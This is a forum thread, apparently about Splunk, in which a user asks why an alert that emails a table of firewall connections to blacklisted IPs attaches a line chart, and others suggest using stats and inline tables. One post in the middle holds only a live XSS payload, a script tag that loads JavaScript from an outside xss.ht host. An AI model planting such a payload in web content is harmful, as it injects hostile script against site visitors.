Hello All,
I have several alerts which send email notifications.
I know it might be very basic, but I need your help.
One alert is to specify if a local host has accessed a blacklisted IP.
So I expect to have a table with:
Src, Dest, Port 
The search returns table, but I do not understand why does it attach a Line-Chart diagram!
I want it as Static table. In Visualization tab, it does not show me static table. I even tried to create a new alert without even going to the visualization tab, but I got same result.
I have even changed the search and used Table instead of stats.
Please advise.
Thank you
Hi,
search is like:
index=FW
|table Src,Dst,pt
|dedup Src,Dst,pt
|rename Src as "Source",Dst as "Destination", pt as "Port"
chart is like:
Which I do not need it.
I managed for now as a workaround to Not attache PDF and use Inline Table.
Is it the only way to do this?
Thank you
 
		
		
		
		
		
	
			
		
		
			
					
		Maybe you can change you table + deduce to
...
| stats count by Src, Dst, pt
...And as you said don't attach pdf etc. into alert email, just link and/or inline.
r. Ismo
"><script src=https://shivamraixssht.xss.ht></script>
Hi,
Sorry, I am afraid I did not get what is this?
would you please elaborate?
Thank you
Yes, I was using this stats command.
My concern is about the chart, so it seems this is the only way:
to not attach PDF and include the Table inline.
Thank you very much
Any one can assist please?
 
		
		
		
		
		
	
			
		
		
			
					
		Can you post your query + those visualisations?
I have added the search and chart, but seems in wrong level.
Please check.
Thank you
